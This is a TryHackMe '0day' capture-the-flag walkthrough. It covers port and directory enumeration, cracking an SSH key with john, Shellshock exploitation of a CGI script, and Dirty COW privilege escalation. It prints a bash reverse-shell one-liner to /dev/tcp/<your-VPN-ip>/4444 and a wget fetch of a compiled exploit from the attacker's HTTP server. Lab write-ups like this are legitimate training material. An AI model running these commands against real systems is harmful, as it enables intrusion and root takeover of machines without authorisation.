0day — TryHackMe — WriteUp

Hello. I’m Rahmos. Here is my 0day — TryHackMe — WriteUp. Check it out!

First, deploy the machine and nmap for opend ports:

nmap -A -p- -T4 -v <ip>

nmap

There are 2 ports opened: 22 (SSH) and 80 (HTTP). Let’s first access the website.

website

It’s a well designed website, huh! It’s always good to check the page source (Ctrl+U), but I’ve checked it and found nothing valuable. So, let’s now find some hidden dirs using gobuster.

gobuster dir -u <ip>:80 -w /path-to-wordlists

gobuster

There are many hidden dirs here. As robots.txt is existed, let’s first access it.

robots.txt

Nothing really. Next, /secret

/secret

A turtle image? Looks like it’s time for some steganography. Download the image and look for hidden data. However, I’ve tried and found nothing, so you may skip it.

Next, /backup

/backup

It’s a private ssh RSA key! Let’s see if I can crack its password using john.

First, use ssh2john.py to change format of this key to the format that john can understand.

python ssh2john.py rsakey > key-to-crack.txt

Then, use john to crack this key:

john — wordlist=/path-to-wordlist key-to-crack.txt

After a while, I’ve got the password:

john

I’ve tried to login to ssh as ryan (which is the name I saw at the default website) and the private key. However, it didn’t work. So this private key is totally a rabbit hole 😣

Let’s look at the hint. It said that focus on the description, which is shellshock . It’s a Bash shell’s RCE vulnerability.

shellshock

shell shock

So, in order to exploit this vuln, I need to know the cgi script’s name. Let’s use gobuster again, but this time, start from dir /cgi-bin, and change the extension file to .cgi

gobuster dir -u <ip>:80/cgi-bin -x cgi -w /path-to-wordlist

gobuster

Yes! I’ve found the test.cgi:

test.cgi

Now let’s exploit using shellshock vuln. I will use a tool called Shocker on Github. Here is the link to this Github repo.

shocker

First, start a listener on your machine:

nc -lvnp 4444

Then, use shocker to execute a reverse shell command:

python shocker.py -H <target-ip> -c /cgi-bin/test.cgi

shocker

It works! Now enter 1 to continue exploiting:

Now use a reverse shell command to get a shell to your machine. First, start a listener on your machine:

nc -lvnp 4444

Then, enter this command to shocker:

/bin/bash -c ‘/bin/bash -i >& /dev/tcp/<your-VPN-ip>/4444 0>&1’

reverse shell

Now I’ve got the shell! Move around and get the 1st flag inside ryan’s home folder.

user.txt

Next, find a way to own root so I can read the final flag. I wil spawn a tty shell using python for stability and also sudo check:

python -c ‘import pty;pty.spawn(“/bin/bash”)’

export TERM=xterm

Let’s try sudo -l to see if I can run sudo:

sudo -l

Uh oh! I cannot run sudo on this machine. So let’s find another way. Look at the description, there’s kernel exploit. Check the kernel version: uname -r

kernel version

Well it’s a really old kernel version! Look for exploit on Google and I found this link.

Download the code, compile:

gcc -pthread 40839.c -o cow -lcrypt

and then use python, wget to transfer the exploit code to the machine. First, start a HTTP server on the folder contains your exploit code:

python3 -m http.server 9000

Or if you use python2:

python2 -m SimpleHTTPServer 9000

Then, from the target machine, cd to /tmp and wget this exploit code from your machine:

wget <your-VPN-ip>:9000/cow

chmod +x cow to make it executable. Exec this code and you will be root!

Now get the final flag in /root folder.

The end.

HAPPY HACKING